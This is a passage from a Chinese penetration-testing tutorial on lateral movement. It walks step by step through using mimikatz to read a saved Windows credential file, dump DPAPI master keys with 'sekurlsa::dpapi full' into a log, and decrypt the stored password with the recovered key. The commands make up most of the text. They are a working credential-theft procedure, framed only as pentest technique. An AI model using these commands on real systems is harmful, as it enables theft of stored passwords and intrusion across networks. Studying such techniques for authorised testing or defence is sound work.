渗透测试干货 | 横向渗透的常见方法( 六 )

3.运行mimikaz , 获取guidMasterKey
mimikatzdpapi::cred /in:C:\Users\MIN\AppData\Local\Microsoft\Credentials\1F914B4D8F36DFD93C3A37B7D5491363
渗透测试干货 | 横向渗透的常见方法文章插图
接下来需要使用的是guidMasterKey、pbData数据 。 pbData是凭据的加密数据 , guidMasterKey是凭据的GUID 。
4.获取MasterKey根据目标凭据GUID找到其关联的MasterKey , 这个MasterKey就是加密凭据的密钥 , 即解密pbData所必须的东西 。
mimikatz.exe ""privilege::debug"" ""sekurlsa::dpapi full"" exit >> c:\log.txt【渗透测试干货 | 横向渗透的常见方法】根据guid获取到masterkey
渗透测试干货 | 横向渗透的常见方法文章插图
5.mimikatz破解密码
dpapi::cred /in:C:\Users\admin\AppData\Local\Microsoft\Credentials\1F914B4D8F36DFD93C3A37B7D5491363/masterkey:3d5c95de7ccd3a1d468efd0d90a42330cdcf06d0e7ee834a443907384a6b25dab8d8ab32c8c9540605711d689304ecab949e168719551d2423498168f7fec6ac转载自:
点击下方“了解更多"


推荐阅读